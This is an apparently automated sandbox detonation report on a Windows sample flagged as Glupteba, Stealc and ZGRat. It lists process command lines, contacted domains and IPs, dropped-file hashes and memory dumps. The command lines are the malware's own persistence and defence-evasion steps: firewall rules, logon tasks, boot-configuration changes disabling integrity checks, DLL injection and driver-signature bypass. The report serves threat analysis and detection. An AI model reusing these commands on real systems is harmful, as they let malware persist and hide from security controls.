C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"
C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"
C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | nic-it.nl | udp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | tcp | |
| RU | 193.233.132.234:80 | tcp | |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| US | 172.67.182.192:443 | onlycitylink.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| DE | 138.201.79.103:80 | nic-it.nl | tcp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| DE | 185.172.128.90:80 | tcp | |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.246:80 | download.iolo.net | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | 9f16c723-2fae-4073-ae52-49abeeeb004f.uuid.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server9.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.sipgate.net | udp |
| US | 3.33.249.248:3478 | stun.sipgate.net | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | tcp | |
| DE | 185.172.128.150:80 | tcp | |
| DE | 185.172.128.150:80 | tcp | |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
Files
memory/2604-0-0x000007FEF5053000-0x000007FEF5054000-memory.dmp
memory/2604-1-0x0000000001060000-0x000000000108A000-memory.dmp
memory/2604-2-0x0000000000FA0000-0x0000000000FFE000-memory.dmp
memory/2604-3-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp
memory/2128-8-0x0000000002980000-0x0000000002A00000-memory.dmp
memory/2128-9-0x000000001B4B0000-0x000000001B792000-memory.dmp
memory/2128-10-0x0000000001C80000-0x0000000001C88000-memory.dmp
memory/2796-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-17-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-15-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-13-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-19-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2796-20-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-21-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-22-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar2D0C.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Local\Temp\Cab2D0D.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3be1cd8e8a989028f9df839489f2b3a4 |
| SHA1 | 464eff20494b8b40e90af864d63415895a375b60 |
| SHA256 | 61b06c55ae3ca320af282806ac68fcd8c83672544e7ca60277c88f8ac41af500 |
| SHA512 | 39a5d3ed9e3c953af4a415ce91316a49abe978d3a7d2285884fcf0f6130bac10888481cbfd1ec5a578fdeb5d9dbad11264e746e7bd6d4d98f0be2b5fd52ca86c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a510c44149273e42339d145eb4b141d1 |
| SHA1 | 8554ab55857c1e2152275ea08afeafbc74213d8b |
| SHA256 | 6ddd0e3f79d4ea6b2e4fd75ed2431e18cde4458b4b0b5ab4162f65fa3e073f7f |
| SHA512 | 048b5971fe2111e5ed02f4ac1b76f62dcb1901cbc87088a735f5064509864c33d256fbfe00197356fbba31cf0e83fdb550e93c4ca0d5e19402876da64969198d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8797a9bab9dc1c4ef157524b6ce678b4 |
| SHA1 | 9d4963f11585e1740db82d7067dcd61ed3808f2f |
| SHA256 | 0add7a0cc2045d9fc5220f844d9fba333472ec58af809066babdb248f1ec9a28 |
| SHA512 | 6ffd3fd65e3422ca1256ef5e22468e2cd6236ae825a27d077d2913659ed2dcd8d2d709aaa21a67d1ad3d2311a016af06649652cbceaa841f4b65fac5e5686d80 |
\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
| MD5 | 5b1e924864690254027a694596f93e64 |
| SHA1 | 009944ff319f0d966db4f3997ba9f87692f7ce8f |
| SHA256 | a227c8047a9b2cff19327b822c89378d4549f0baee2af1e7345e8ede3adbe29e |
| SHA512 | bbb54905892328d16743d2d953df4ac2c10192ac76b4a99248f64d0c675d487bf74af007d52e2196e80bfa61e84fe7604c8f6be5620102bc1d7820dd89e2d798 |
\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
| MD5 | 9da2ccfd03fcc77b189df9df555b36bf |
| SHA1 | 9367ac8be24bfcd192bb6981f8e24b3c3cc630ec |
| SHA256 | 6cd1adb5a2be81ba9441b69bb45a493b58e82b58ad3e4f2c93861c23f9b38d88 |
| SHA512 | 627cb25cbe42c1a444d13a3041644af00e59a20cc1590b7664a22a7596b10f279aec2f2d0dbac79616eca0457202cd1982fe7257134d653d15baa5fcd51cae8a |
\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
| MD5 | 8938be9b1ac1f7cfc1104628fd55c164 |
| SHA1 | 3f85babacf62c0443b17c7c5af470dd11648e3b3 |
| SHA256 | 2f000b4830c2267d4b1d17231a5c249b79a0d62ff2bfd0ef3d01763a5d1b4d03 |
| SHA512 | ba2619bbc481c70d85eaf862b60e8cdf4c588540742a8343b057f95212468c41b1ea244376c9122feb69d236cfdc2c2d423c29acb458e40a12c947a398b55a92 |
memory/2308-249-0x00000000042B0000-0x00000000046A8000-memory.dmp
memory/2160-250-0x00000000041F0000-0x00000000045E8000-memory.dmp
memory/948-252-0x0000000004210000-0x0000000004608000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1ls.0.exe
| MD5 | ac3b1a30e96b6d89ce98a21bb5b2093a |
| SHA1 | 4270104678195b8cad3520a704c556155a0a65b5 |
| SHA256 | 803946c2712aec2b60b54b3cd7c3375a9a0158e7ccbfbd4ab8a66e6ddfc7d463 |
| SHA512 | 65e74527ffa9d6e776d063db44322080315a5a9eb13bb67acd61be6e65862ec127366d742beca349c7ca8281e2f67193bafc14c8c0ee3f222b19b452d05c8491 |
memory/692-266-0x00000000041B0000-0x00000000045A8000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1ls.1.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/2080-287-0x0000000000400000-0x0000000002597000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 9879d2f6426cfd242f8bf14e1b1497ce |
| SHA1 | 74933816cb70f25dae8f8e7d7f6fd6bc21872227 |
| SHA256 | 7c7bdb740839e609b3cd04df32d30bbc7e800029375419371f9f83d9c69bea3f |
| SHA512 | 133cf38ace0da0414e35e4d93faee43910b0f899c7d600ff0cc8bcf0c6f3167df2e973b752a9fa042f0f3bf3c91ac3771c975c05eb6f05f3d9a27185379ac4d5 |
memory/2308-311-0x0000000000400000-0x0000000002957000-memory.dmp
memory/948-312-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2160-313-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-314-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2604-316-0x000007FEF5053000-0x000007FEF5054000-memory.dmp
memory/840-315-0x0000000000400000-0x0000000002574000-memory.dmp
memory/1608-317-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2604-318-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp
memory/948-343-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1728-344-0x0000000004210000-0x0000000004608000-memory.dmp
memory/2160-346-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2308-345-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-347-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2308-352-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2160-353-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-354-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 0f6de58ed7bc31e0f8f79b5301c6adad |
| SHA1 | 776cf3bbedde0d754dc0de3b52ff1a6485decb2e |
| SHA256 | 99c2851dcd6f349e087a2c8bb2839f9e09bbd94f6c75a1026b7ed31534341f24 |
| SHA512 | 99535a0d27f57d72ce7181d8a71958daa59e6a4722ed18df000bbd6cd88ed345b43e143c27f4fc172f10dd48389f4538d0370b5caeea81a89e0215f85830ce75 |
memory/1332-363-0x0000000004280000-0x0000000004678000-memory.dmp
memory/1784-362-0x0000000004270000-0x0000000004668000-memory.dmp
memory/1728-373-0x0000000000400000-0x0000000002957000-memory.dmp
memory/832-374-0x00000000043F0000-0x00000000047E8000-memory.dmp
memory/1608-378-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2932-379-0x00000000042A0000-0x0000000004698000-memory.dmp
memory/1608-380-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2032-381-0x0000000000D80000-0x00000000045B4000-memory.dmp
memory/832-384-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1332-383-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1784-385-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/2368-391-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2368-405-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 43d56c88d39f168ff893a9da3f186556 |
| SHA1 | b16f0b7153d9a187bd47cac26b3a9fcc30bab431 |
| SHA256 | 04d40d86ff32023f5890dd8926199bb67036472d0028eff02241c7c2d39428b5 |
| SHA512 | 72fa98226be84f12a0ce03520e5afac06913a18290623499d9e0a18ee32e9dd86cceee5693d65f0fef91e27ead7e572691b939f54af31f72fb1b00fa9ee4cd2f |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2032-463-0x000000001EE30000-0x000000001EF3A000-memory.dmp
memory/2032-465-0x0000000000BD0000-0x0000000000BDC000-memory.dmp
memory/2032-464-0x0000000000540000-0x0000000000550000-memory.dmp
memory/2032-466-0x0000000000B10000-0x0000000000B24000-memory.dmp
memory/2032-467-0x000000001E490000-0x000000001E4B4000-memory.dmp
memory/2032-474-0x0000000000370000-0x000000000037A000-memory.dmp
memory/2032-475-0x00000000006D0000-0x00000000006FA000-memory.dmp
memory/2032-476-0x000000001F510000-0x000000001F5C2000-memory.dmp
memory/840-477-0x0000000000400000-0x0000000002574000-memory.dmp
memory/2032-478-0x0000000000380000-0x000000000038A000-memory.dmp
memory/2032-482-0x000000001FD60000-0x0000000020060000-memory.dmp
memory/2032-486-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2032-485-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2932-484-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2032-487-0x00000000059C0000-0x00000000059CA000-memory.dmp
memory/2032-488-0x000000001E9A0000-0x000000001EA02000-memory.dmp
memory/2032-489-0x00000000059D0000-0x00000000059F2000-memory.dmp
memory/2032-492-0x000000001E300000-0x000000001E30C000-memory.dmp
memory/2032-497-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2032-496-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2932-499-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2932-504-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\63f93027eed6195cee9d6793abbff365863d6c04fe54f71a30d295ffeacda31a\e71d4ecc3a0a47099d52437ef9d6ac62.tmp
| MD5 | 66c2705e059a053c7a2bee2e6a4e244b |
| SHA1 | 7a6bc287e6dfcc866315aefe8eb71d142d8d6935 |
| SHA256 | 728ba6a9f43412932ab6e26174da8d3decc3caddafd2f29cf3432c89e8729a39 |
| SHA512 | 6f63ad1626c2b5ca4970d153be109131a42ceff16e2419e25c130df23cacf45b6ab4f6dd63df63fb80e10f9df2f97e3403866568de0801b28a3da75ca1c8c77f |
memory/2932-508-0x0000000000400000-0x0000000002957000-memory.dmp
memory/840-514-0x0000000000400000-0x0000000002574000-memory.dmp
memory/2932-515-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1748-561-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1748-565-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2320-568-0x0000000000400000-0x00000000008DF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-08 23:52
Reported
2024-05-08 23:57
Platform
win10-20240404-en
Max time kernel
296s
Max time network
300s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
